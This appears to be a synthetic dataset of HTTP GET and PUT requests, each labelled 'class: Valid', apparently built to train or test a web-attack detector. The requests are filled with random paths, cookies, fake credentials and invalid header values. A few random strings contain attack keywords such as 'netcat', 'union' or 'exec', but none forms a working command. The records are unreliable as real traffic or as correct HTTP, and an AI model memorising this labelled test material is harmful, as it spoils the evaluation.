Via: 1.3 115.227.188.158
Transfer-Encoding: deflate
Upgrade: nay/4.9, hiEdJm/5.4
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23830
Start - Id: 1542
class: Valid
GET /tyhrhec4Ttd7t7/pqlH15hc8j/fICZpwAxX@Bp410BeDg/p6ieuD9ehy/OoT0/2ibito/GBrhiniwesie/nxXPf/familNuftem/tXr/o6tSte.tiff?t9=nait1dt1&ieasElinip=976708&aeeia5r=tn+L%3C&83aHEpe=+oros%3A+t%27ea&ym0e=7345 HTTP/1.1
Host: 199.49.182.46
Connection: close
Accept: */*
Accept-Charset: windows-1250
Accept-Encoding: deflate;q=0.2, compress, compress;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 185.157.234.182
Cookie: a457fIuTtoh1=ha-Jg3UU
Cookie2: $Version="380"
Date: Thu, 09 Jun 05 23:43:20 UTC
ETag: W/"mDM0gt-fNVTwv79ck@"
Expect: 100-continue
From: uared@sesbwap.com
If-Modified-Since: Tue, 01 Jan 08 17:04:06 CET
If-Unmodified-Since: Sun, 03 Jun 07 01:44:45 UTC
If-Match: "qgWHQmAZXI3lc5ur"
If-None-Match: "9CfJ1PW.IrJ@H-Ks9B"
If-Range: "adA74QmOTo-MH.cQPx-G"
Max-Forwards: 070
MIME-Version: 3.6
Pragma: tfun7ahu=doxne
Proxy-Authorization: llfas e2an=onnlesin
Authorization: Digest algorithm=MD5
Range: 217-7,6387-6
Referer: /nis4wrle.conf
TE: trailers
Trailer: From
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 3.2; eo-al; rv:2.2.6) Gecko/56154409
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 1.3 205.244.219.60, joite6/1.4 www.Fll0.css
Transfer-Encoding: tgqr3l; WIiioen=wp4dtl
Upgrade: ane/0.8, d9tm/6.0, t3eu/5.9, itbhTr/3.7
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1542
Start - Id: 23500
class: Valid
GET /sd/hWRgi.tet2NfpY/znsehroes/femryisoizsyitdonh/bUWuoO3.msf? HTTP/1.0
Host: www.tAoLhet.it
Connection: close
Accept: text/xml, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 191.95.49.69
Cookie: arEsianhalieswt=23056222;iEhcT9t=7lSDEhqLm1
Cookie2: $Version="3"
Date: Thu, 05 Mar 09 11:26:46 CET
ETag: "nzDiXVOYgqMqegC"
Expect: euei
From: ltnesme@hsentase.it
If-Modified-Since: Fri, 23 Jul 04 07:44:30 UTC
If-Unmodified-Since: Mon, 30 Mar 09 01:43:00 GMT
If-Match: *
If-None-Match: "EXnt8v9LbnbLLbRnl"
If-Range: "MZp86oD6-KVmUYDr4"
Max-Forwards: 777
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: Digest username="hancvuUr"
Range: 58-,728-,-0
Referer: http://keeln.ch/odeo/t4ig.nsf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.7 (compatible; Konqueror/5.4; SunOS sun4u; aeUtroI; Ymnrepsf)
UA-CPU: x86
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: 5.5 www.lktsm.js
Transfer-Encoding: gzip
Upgrade: akoe/8.8, eee/8.5, nl0i/0.3, noNso/2.0
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 13.46.12.196
X-Serial-Number: 22339968152502117473
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23500
Start - Id: 30769
class: Valid
GET /shFX5rG2roFo_A0T5.cfm?ffOmphsz148tiHY=r&TstoAhnae=0&rhsytgoiufShdn=06249&nrbr=ableotdeu5dgon&tutfheq=Ni&RSJzxCJ=r%40Z77O&hAfw7Rtrtgio=inakxusghencip&gaeorhbNia=34&dropgCWZsHPfvXB=tonaIehnreuciee4ptelnet&rkt8w2FL@=3415228 HTTP/1.1
Host: 183.198.222.18:7073
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: no6-dmmg, hn-Htsets;q=0.4, mSes-ehemiIt
Cache-Control: no-transform
Client-ip: 239.100.27.219
Cookie: efubeeeaee=08wJirheot;tUja=t;osiz=d6hiNSdaa;tbmterdi=mailinp7inputeunG;gl=BccOA88Sstdinl;jeZysdecseAsa=5totltNirsTictdi
Cookie2: $Version="0"
Date: Tue, 03 Jan 06 15:15:15 CET
ETag: "XDy91SYraxCKr0x"
Expect: dhOtrocf=8trheo;f7rimsn
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Thu, 10 Sep 09 11:38:53 GMT
If-Unmodified-Since: Tue, 31 Aug 04 04:48:11 UTC
If-Match: *
If-None-Match: "4Ngv3vpacdnDbDljZlm"
If-Range: *
Max-Forwards: 183
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: hTdloi hemFpcud=siExOz
Range: 145-,977-10
Referer: http://3eeea3ra.cz/ihyOzds/qzdxeeo/sgmiroH/ti0a/dSzr.dll
TE: trailers
Trailer: TE
User-Agent: rafiqspb1 (eNGR0pQ; nVebkbDSs)
UA-CPU: 68000
UA-Disp: 744,1924,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9905x3128
Via: lai/9.4 www.aEsips.htm
Transfer-Encoding: weNi
Upgrade: Esnoo/3.6, ime/7.7
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 93006994743675
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30769
Start - Id: 18789
class: Valid
GET /uhbinZYZpwrexec7tmp/mEQ_a3ltoRAXp8UT/dR4pkY/e512jQIKQ/etn15rmyormtsqe3pE/itec4nlEofre9eri/a1P/c15Pxsp-z6eyh.msf?mtlm4aeot4ed=91455&rl7ntdneutm=13044&enlThEeltstn=sO&lor=rHtnbnhTohc148oe&Dkd-L@=es&6e=m4nLXnWSJa&lnahcotirso9=TtisAnnSoi&ngfdla2h=49473&etOl=u%40rvaenhttps3kofrs+nqc&7uZwxtoftg=101528&8kted5=2 HTTP/1.1
Host: www.5eei.st:99
Connection: 92eolelb
Accept: text/plain;q=0.5, application/x-tar;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, compress;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 194.55.103.9
Cookie: leoRdplaasdEcd=ho
Cookie2: $Version="85"
Date: Fri, 13 Apr 07 14:26:21 UTC
ETag: "915NzLGEFb2FG7Ud@t"
Expect: 100-continue
From: ni9cft@w6rom2bfn.de
If-Modified-Since: Tue, 06 Jan 04 13:12:21 GMT
If-Unmodified-Since: Sat, 20 Oct 07 08:40:07 UTC
If-Match: *
If-None-Match: "EsJxFiU0JctPAsx"
If-Range: "tkbWGeerseq5GnRYX"
Max-Forwards: 47
MIME-Version: 8.5
Pragma: aer='y'
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Basic c3d5dXRlYTpkeWlN
Range: 948-33471
Referer: /laajIQt/nvasees/U5wpzs.css
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/4.9 (compatible; Konqueror/7.3; WinNT; a2iella)
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: 1.9 154.16.160.157:71091
Transfer-Encoding: compress
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 003 www.Ooy6hd.tiff "oonlbt8n4cweMttbL" 
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18789
Start - Id: 22532
class: Valid
GET /uisof3rKqg_iSOeBnd/tRuH@I/eeshmqDhx9eo/mRMvP/33jVZB2-58wp-Pg_W/u920U3RlhUit/6ncnDayn0Rgyoctqh/taemhi9e/nsmoNHaqQlh@g/hh4UZYvE2aeOFoWwv/is.swf?cuuhocilnlbt=0625&EHE=6137803074&eoeertr=byusppeed1eaftdsE&ei=1&Tn2seve=ean5saas&tts04zsjaafj=a%7C%3Clogwo2awwcvariseval4&reogao=t&aebrisuyai=e3t0kys6&wjranYWJkimg=ehIahejn&lhpiihes3sek=-&bseeE=26&i0t=807&hBstSwBfnio=501&H7eiJr=eRn6czoo HTTP/1.1
Host: www.fmtceEAdwn.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1257;q=0.8, iso-8859-5, iso-8859-5
Accept-Encoding: 
Accept-Language: de-on5k, wmlmnn-9jtdos5t, Rhs2Ief-Cho;q=0.7
Cache-Control: max-age=18316
Client-ip: 54.135.83.53
Cookie: gon3wa2=t
Cookie2: $Version="833"
Date: Tue, 07 Oct 08 08:11:32 CET
ETag: "XeYNVJeAf30CKdgTK4d"
Expect: ay2unwu=ibieoeya;itaeqmon=wcAn
From: tetoseli@i9ihet.it
If-Modified-Since: Sun, 12 Sep 04 19:31:18 UTC
If-Unmodified-Since: Thu, 09 Sep 04 06:27:19 GMT
If-Match: "d1@z.eUxY2oQQnWs"
If-None-Match: *
If-Range: *
Max-Forwards: 101
MIME-Version: 1.3
Pragma: n1=llmAB
Proxy-Authorization: Basic cnJpMGFlbjptaDlpcw==
Authorization: Digest uri=/oestahjk/earNhalt/edodesO/e40rnh/bo4eejnp.cgi
Range: 97-403959,415744-,056-023107
Referer: /4eot/iea2Sd/Sgao/nnlsddog/jayise8.jsp
TE: gzip;q=0.7,trailers
Trailer: User-Agent
User-Agent: htTewsae/0.3
UA-CPU: Sparc
UA-Disp: 699,5720,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8535x3103
Via: wils/3.9 www.es5aeaex.js, HTTP/7.8 www.ttuw.htm:15680, 4.7 www.To0arc.jpg
Transfer-Encoding: gzip
Upgrade: tae/6.4
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 0491740909145878411
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22532
Start - Id: 10960
class: Valid
GET /o1rlRN1fkb7Q/cqJXbDTo-Oo/n-hPrxJm/ooyaocts/TWZCjIlPgvSphpgqH/ibs/seace8srNd8/d3oeUdiisi/9Xl-EAj4C3h9n/xNhps3yL.msf?tiwo8eeM=c36wfng&t8nniatfeg=lrlo3aBaeo3eeon&eiyase=dtn2nancNth&tmUeznespE3=xp_urot9gpjekn&AP5A=43122&winntMk0qDoyselectWcy=Rmreds&eeoerrgnac1e=flf%40yo&elAggc=rw7%40jzAdXKo&pIePC=4829318&ca62ol=8aiwebetween+lir9wgde&6pnm=so%3Daucl&enf1waiibhkymr=-hd%3Fe%5Btnsdtieln64 HTTP/1.0
Host: 105.170.154.206
Connection: close
Accept: image/*
Accept-Charset: gb2312;q=0.3, windows-1250
Accept-Encoding: *;q=0.2
Accept-Language: ehb6eGtn-1, hou-4mw;q=0.0, yiahatf-aaw;q=0.2, lzaae-norxo, eit1e8U-ttaaydn;q=0.7
Cache-Control: only-if-cached
Client-ip: 240.57.142.227
Cookie: ieoAIedhomdtaor=bre0kc;8md=itar4
Cookie2: $Version="631"
Date: Sun, 18 Feb 07 10:32:12 GMT
ETag: W/"9AWDF1sgjXBacxqI7"
Expect: 100-continue
From: eidl@nam2P.com
If-Modified-Since: Sat, 10 Oct 09 07:11:11 GMT
If-Unmodified-Since: Tue, 27 Nov 07 11:16:54 UTC
If-Match: *
If-None-Match: "ZhR7PfyT--pu8TnUsOx"
If-Range: Mon, 06 Dec 04 24:33:43 UTC
Max-Forwards: 0
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: tetd qssd=15tmhB
Authorization: Basic b2h0MjplZXppbzdldA==
Range: 459-,-939336,-414577
Referer: /ams73O.swf
TE: trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/5.6 (X11; U; Solaris 1.2; wp-so; rv:0.3.0) Gecko/50189984
UA-CPU: 68000
UA-Disp: 9552,487,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7346x718
Via: FTP/9.7 232.68.106.110, HTTP/2.7 www.eSsibeg.html, HTTP/3.1 142.221.159.238
Transfer-Encoding: deflate
Upgrade: sgsic/5.6, ntlan/7.1, 6jase/6.4
Warning: 917 173.28.222.9 "HHlwrlufhgiWi" "Tue, 01 Feb 05 01:45:23 GMT"
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10960
Start - Id: 19859
class: Valid
GET /ra7/wcsbs/ySl/8os/a3bemnmontn7aehti/enarmpe2utrch6euym/Rens/r4sfmxfta/9Tshutdownf.aEj6LPCP0.jpeg?panite=OkoBsiThae8riofr&snrSrqtron5phl=490&6qhOtbldoyLrun=oenber&obetweenCMIA=913517&d6iagnrbaSa=odroplsn+ao%5Ce2ene&lmeeriaAhsyRjs=la%2BtnNpexmr HTTP/1.0
Host: 131.191.22.216:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9595
Client-ip: 171.173.25.232
Cookie: ilbhrs=soqioRa;eletaeW=eoinaebaIbuxriiLN;wikse6s=59763601;desagteeorlr=oem@Dhtavrbetweenz;orb1rlaqt=crn
Cookie2: $Version="4"
Date: Fri, 29 Apr 05 12:36:19 CET
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: deaen7oe
From: aOwtSto@tiXNyad.gov
If-Modified-Since: Wed, 20 Feb 08 21:11:46 CET
If-Unmodified-Since: Fri, 29 Apr 05 12:27:35 GMT
If-Match: "2kY7.QQtMBIUCXl"
If-None-Match: "vluJb6LIveBW8D_"
If-Range: Thu, 17 Mar 05 23:54:42 GMT
Max-Forwards: 903
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="1edg8te"
Authorization: tea1o nhanj=jrinhc
Range: -436,22187-4
Referer: http://yLst.biz/ojne.msf
TE: deflate;q=0.4,gzip
Trailer: Accept-Encoding
User-Agent: 2Iwat3
UA-CPU: StrongARM
UA-Disp: 8579,909,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/4.4 251.129.250.106, FTP/0.7 www.lk4shIo.html
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19859
Start - Id: 16794
class: Valid
GET /xTnshm/izj5/bru5xtkesrewrBi2cui/aaapoeu5Bnaabp/3.nk/37esFeuyt/YI0JczYoa-/r8X8LFoPa_269ze/ahsol/rnaearh7Bheontdro.dll?ecniuhSEvyezih=645&pFiera6tamrei=16613&qneieeo4=8685&5zpo3ssyg=Tcieae+ui+eo&edhiroorsvymNe=ril%3C%25rAoeigtj HTTP/1.0
Host: 13.144.149.18
Connection: gOmut
Accept: audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 41.79.231.230
Cookie: tra=h':ors?netcat[snqtr;3_Uhnph-MoNCy=roeccynrcs;E0Eile3=it e;05calgtsaaT=he
Cookie2: $Version="7"
Date: Sat, 14 Aug 04 09:46:57 UTC
ETag: "Ppyt6cEuEC9dpgF"
Expect: iu8leh=3htcueoi
From: qeirgp@9goyD.st
If-Modified-Since: Mon, 14 May 07 20:03:27 GMT
If-Unmodified-Since: Sun, 25 May 08 07:47:04 GMT
If-Match: "aJpIkAl3@JnYzXpKnW-"
If-None-Match: "QNNmeZMeFEm2oj4ceGEw"
If-Range: *
Max-Forwards: 5942
MIME-Version: 8.3
Pragma: keU='dzehr'
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: NTLM dnJhaGVhYmptcm5obGNoaXRjc21zbmhOb1JVNjd1dGM0ZmFTUGhqaXVudHJjN3Q=
Range: -942,21-,378-
Referer: http://eo8hebj.st/TexoIg.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 7.6; ny-oe; rv:9.4.7) Gecko/43268285
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 561x3269
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: identity
Upgrade: yxx/3.4
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 60090044663
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16794
Start - Id: 24502
class: Valid
GET /cjensddq39mnod6wi/auyu/avwADm8meoBWg@f3Wc/1ha.png? HTTP/1.0
Host: www.zsoyihhbc.st
Connection: close
Accept: image/png;q=0.5, application/x-tar;q=0.4, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 200.84.2.93
Cookie: biraef=89826689;qnHHpod=893528054
Cookie2: $Version="892"
Date: Fri, 10 Nov 06 17:24:24 GMT
ETag: W/"nRclM1pE4cfKGzfJkUhU"
Expect: 100-continue
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Sat, 24 Apr 04 11:37:02 GMT
If-Unmodified-Since: Thu, 13 Dec 07 08:10:33 CET
If-Match: *
If-None-Match: "CudTdNSArQwRUyalHm"
If-Range: "DB8I4Ruuue@6mLF.z"
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Basic ZW94Y2Jtc3Q6d2luZWFoeQ==
Range: -7
Referer: /hreei/teCs7s/ewIqn5t/zA88nyf/dygadie.wmn
TE: deflate;q=0.8
Trailer: Warning
User-Agent: tcs5/4.8.1.3.4
UA-CPU: Sparc
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: FTP/0.7 www.ootsas.shtml, 8.3 78.29.171.30
Transfer-Encoding: gzip
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 034 www.Spei.html "fet3seino8hio" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24502
Start - Id: 30613
class: Valid
GET /rnpuitd/pKIcm@/o3QV0sbZrY/O5w/_OP4I.0PkD9Ms/Lfd94d1rdut4/daoaieeobpeagselr/eiNA3/wgruGinaabaIwea.css?oIcnei=774797450&lhat=73692&uor=reIjttmorrvtoo&y4k3lankWhem=o5nifnlntaef&ibbe4o=vEhilbmota HTTP/1.0
Host: www.nb0h.net:80
Connection: nbr3
Accept: video/quicktime
Accept-Charset: x-mac-hebrew
Accept-Encoding: *
Accept-Language: 6te-i9tr, m5-ehehssm2;q=0.1, t-x
Cache-Control: max-stale
Client-ip: 129.82.35.213
Cookie: jnCphH88vEF4=$ejruloeexecea?
Cookie2: $Version="3"
Date: Mon, 21 Jan 08 02:54:58 GMT
ETag: W/"5ghmaGHNwzChrja"
Expect: hann
From: ewemen@Ld96ee.de
If-Modified-Since: Fri, 22 Apr 05 07:02:45 CET
If-Unmodified-Since: Sat, 04 Jul 09 02:19:56 GMT
If-Match: *
If-None-Match: *
If-Range: "elda_-Gm3Z2AxU0CPz"
Max-Forwards: 50
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ro3tm esa4ehee=afee4
Range: -44,-9596,885-03597
Referer: http://www.ate5s.ch/imCs/eEer.sh
TE: deflate,gzip;q=0.9,trailers
Trailer: From
User-Agent: 7pdPU9CN7 http://www.i4det3.org
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9301x810
Via: FTP/2.8 www.cdbe.gif
Transfer-Encoding: identity
Upgrade: r2h/2.9
Warning: 036 www.4tognA.html "Tttoenhio9nolunani" "Sat, 24 Oct 09 24:15:22 GMT"
X-Forwarded-For: 147.151.22.151
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30613
Start - Id: 13227
class: Valid
GET /uBBo7lbMaVfScTvg.cfm?JriihtaccesvorGz9.=dZ%40aP9d7j&efaecshtuA4a=514 HTTP/1.0
Host: 214.25.238.183:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: diioq-ereu;q=0.0, thtuyNhc-gr2dkt;q=0.5, dsaiwk-1x;q=0.1, e-e8cu;q=0.7
Cache-Control: no-store
Client-ip: 93.188.236.120
Cookie: Nllglf5gma=8169;FHV_P=pro
Cookie2: $Version="9"
Date: Mon, 29 Jan 07 04:22:21 CET
ETag: W/"wKB4PF50ISEJhLSI"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Tue, 28 Nov 06 05:22:33 UTC
If-Unmodified-Since: Sun, 17 Dec 06 14:11:25 GMT
If-Match: *
If-None-Match: "LKd6xXfA9tY27kEFRBY6"
If-Range: Sun, 11 Jul 04 12:12:33 UTC
Max-Forwards: 06
MIME-Version: 2.3
Pragma: ltondh=z
Proxy-Authorization: NTLM Z291M0xhdmFvaXR0bzFhdG5ubHF5OWVqaWlvbjY0bW1hZzE0cmE=
Authorization: Digest username="tte8oeYd"
Range: 781398-
Referer: http://R8d72b8.cz/dghs.php3
TE: trailers,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/3.1 (X11; U; Unix 1.0; gs-Ui; rv:6.7.4) Gecko/72507954
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0644x4793
Via: 9.0 40.178.192.119, 8.6 www.nilibdg.shtml:1006
Transfer-Encoding: compress
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 425 21.68.143.190 "QCkne1pyhareon" "Sun, 26 Jun 05 01:41:26 CET"
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13227
Start - Id: 22178
class: Valid
GET /dbzZ4_Vr/l3m/ByinXh_TlECCjgZ/Lh_/1psEF7brIE5/eersirm/waeorKe5viJrCm/sOr7r8Okk04/EXnc5FNQnVy/ouHovqermcarIonoNdan/autoexecmYzyf94/svino.htm?trbn=iZg.G%40w&Ietoi=2751 HTTP/1.1
Host: 136.164.185.210
Connection: Cprrlsud
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity
Accept-Language: weeasJE-udEhezNd, 24ch-uelbagXm, 8u-7j6;q=0.9, 2-Slcs8otm;q=0.4, r7vXEa-a6d
Cache-Control: min-fresh=0332
Client-ip: 21.99.62.109
Cookie: sll=s2ed1nrnt9mtJe;ugzp6Xtatoth9ti=pLndga;heu=B&ny;oieAcnyynua=wtmZscriptnGt;pbaoWNseeEdtae4=mjj;qiinbos=mut
Cookie2: $Version="646"
Date: Thu, 09 Nov 06 11:32:25 CET
ETag: W/"gwkQsbsKy45ai2dUrlD"
Expect: 100-continue
From: wiKeelga@iawciImato.be
If-Modified-Since: Sun, 23 Mar 08 03:26:58 GMT
If-Unmodified-Since: Tue, 21 Apr 09 22:36:05 CET
If-Match: *
If-None-Match: "16rN6BXyLHAcSZ3a"
If-Range: *
Max-Forwards: 383
MIME-Version: 1.6
Pragma: twe='Ae'
Proxy-Authorization: frls dscr=zajryd
Authorization: Pnsis etyeeA=atm90uy
Range: -8,26857-
Referer: http://sLaeis5.cz/mUTO/r5it0dar/es9tv/dplonjte.jsp
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: isnoPekv7
UA-CPU: Sparc
UA-Disp: 8602,435,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: AeNwpo/4.9 137.142.159.181, FTP/5.3 www.bU8dE.tiff, 4.1 www.as3O.htm:25
Transfer-Encoding: identity
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 577 133.51.82.232:3250 "nwoeWd5awlant" "Sat, 28 Jul 07 24:56:13 GMT"
X-Forwarded-For: 72.15.131.218
X-Serial-Number: 29292278992836758450
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22178
Start - Id: 26502
class: Valid
GET /Syhh9tctmi.nsf?eab.i@J=i.oTY&39ysbdheetgms=hevalevc9gs&a2e=0191373714&srq=RlsuyadueyA0e&f..Wpj=g-eie4mrEvLdlink&c9trohamao=12646577&idn=ont&tBayoaaehtc=pteia7&hhoczUtAeo2B4a=0&ecW0HNe=u9tdiv&clitrnaeaot=0343915474&hrutsn=95647073 HTTP/1.0
Host: 125.47.247.154
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 196.239.181.136
Cookie: nrfttiZlaei=wn;kzrxuImr6rohs2=Nsa5tiasqnaaiSIprs;aob1swiTtNerewn=755;etTsivhEi6Aaip5=vdlmh
Cookie2: $Version="306"
Date: Thu, 27 Oct 05 21:02:40 UTC
ETag: W/"14xLZ3LqXJqtOGG"
Expect: ofpnit
From: 4e5f4@aengr.net
If-Modified-Since: Wed, 30 Sep 09 16:47:05 GMT
If-Unmodified-Since: Tue, 10 May 05 09:28:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5303
MIME-Version: 2.3
Pragma: t8=ceTib
Proxy-Authorization: Digest username="oynAo"
Authorization: NTLM bG5hYUNzU2xhY3J0bmFOZXhlbmZ0dGVhbjhuZWV0YTlodFRo
Range: -394,77057-
Referer: http://www.scbaepbT.org/neime/CEhi/vaDbCe2/olnizm/SfosN.cgi
TE: trailers,trailers,gzip;q=0.2
Trailer: Pragma
User-Agent: iYcgt9Zvy http://www.larArti.cz
UA-CPU: MIPS
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 106x0303
Via: 9.9 www.i4nA.jpg, 2.7 154.234.203.246, tmcnOn/9.7 179.17.203.104
Transfer-Encoding: gzip
Upgrade: erCd/6.1
Warning: 109 40.196.142.202 "e8niNthu" "Thu, 07 Jun 07 12:41:01 CET"
X-Forwarded-For: 251.182.204.109
X-Serial-Number: 7639559480776
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26502
Start - Id: 4905
class: Valid
PUT /S_/Punion2P2KGg/8ds/cxsO9aHahuyat/oemTAJP1M0Q9uiZyxv/QpUCv7zhj/ix.mlmBfMxi/isnaH@ctMO9mA80A.mspx? HTTP/1.1
Content-Length: 102
Content-Language: c5oa
Content-Encoding: identity
Content-Location: /hinenu/sioe8d/eafh/TwsaoOt.gz
Content-MD5: Y29lcnlsdWFlaW5zaW5lZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Aug 06 10:48:08 GMT
Last-Modified: Tue, 24 Feb 09 03:51:56 CET
Host: 183.42.86.43
Connection: tseesqd
Accept: video/quicktime;q=0.6
Accept-Charset: ks_c_5601-1987, euc-jp, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 165.127.88.109
Cookie: dtSah=alrr0Leracec1Sm
Cookie2: $Version="9"
Date: Wed, 05 Jan 05 22:35:19 UTC
ETag: "xx0X0EUsOXV7rKRB"
Expect: 100-continue
From: ldsl@rLaltEo.net
If-Modified-Since: Wed, 18 Jun 08 17:35:34 CET
If-Unmodified-Since: Tue, 19 Oct 04 09:37:33 CET
If-Match: "IYkMQexoSkuOg0gihrl"
If-None-Match: "wII7.wMR1qRHPhWvOXJe"
If-Range: "eOnIx1MhARXbD4U3"
Max-Forwards: 857
MIME-Version: 4.1
Pragma: ado5e=9
Proxy-Authorization: NTLM dWFud2xwRU9pTmVuZXdpYWxjdHdJamR0bGVlbmllbTJrdFdmdmFsbGw=
Authorization: bxyr Cr6d=0pea
Range: 0401-,-401,485260-5
Referer: http://ahCotc.de/aae9Y/R4uttit/e0t9m/is74a/hdt3el.sh
TE: chunked;q=0.5,deflate
Trailer: Date
User-Agent: Mozilla/1.3 (X11; U; SunOS sun4u 2.2; 1y-te; rv:2.5.8) Gecko/16972750
